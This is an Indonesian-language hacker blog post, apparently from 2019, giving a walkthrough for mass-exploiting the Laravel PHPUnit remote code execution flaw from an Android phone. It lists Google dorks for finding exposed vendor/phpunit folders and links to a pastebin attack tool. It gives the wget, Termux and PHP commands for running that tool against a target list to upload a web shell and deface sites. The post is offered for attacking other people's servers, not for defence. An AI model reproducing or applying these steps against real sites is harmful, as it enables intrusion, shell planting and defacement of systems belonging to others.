Breaking

Senin, 02 September 2019

Laravel PHPunit Remote Code Execution


P wr wb. Halo ges balek lagi karo aku adm000n terganteng sedunia, anda bNar kali ini tutor depes lagi ges karena apa? Ora depes ora debest Bosque👊😎.
Seperti yg ada di title gw kasih tutorial depes phpunit remote code execution di android njir, enapa di android tross? Karena w mie skin gada pc thx. Btw disini gw make toolsnya abang Rinto ea gaes terimakasih juga buat bos Rinto/Con7ext yg udh bikin tools yg berguna buat aq yg noob ini langsung aja muehehe.

Toolsna https://pastebin.com/raw/4JEFHVFE
Disini aink pake termux ea download termux di playstore.
Dork:
inurl:/vendor/phpunit intext:"index of"
inurl:/vendor/phpunit ext:xml

Download toolna gaes kalo gamau ribet tinggal wget aja
$wget https://pastebin.com/raw/4JEFHVFE -O phpunit.php
Bikin list target na dulu bos bikin file baru list.txt lalu isi list.txt nya dengan target kalian tapi ingat isi domainnya saja ya vendor/phpunit/blabla gausah.
contoh (http://kentu.com) saja jangan (http://kentu.com/vendor/phpunit)

Yang baru download termux aktifkan permission termux nya dulu di pengaturan
Ok buka termux lalu lakukan update & upgrade dulu
$pkg update && pkg upgrade
Lalu install php na
$pkg install php
Klo udh tinggal jalanin toolna
$php phpunit.php list=list.txt
Biarkan toolsnya bekerja
Jika shell sudah terupload akan seperti ini
Kelen tinggal salin akses shellnya lalu paste ke browser done
Tinggal soop poc? Rce > bl3h4k.html
Nyamuk Disc0de :
Jika ada yg belum ngerti silakan kontak w di bawah huehehe

Tidak ada komentar:

Posting Komentar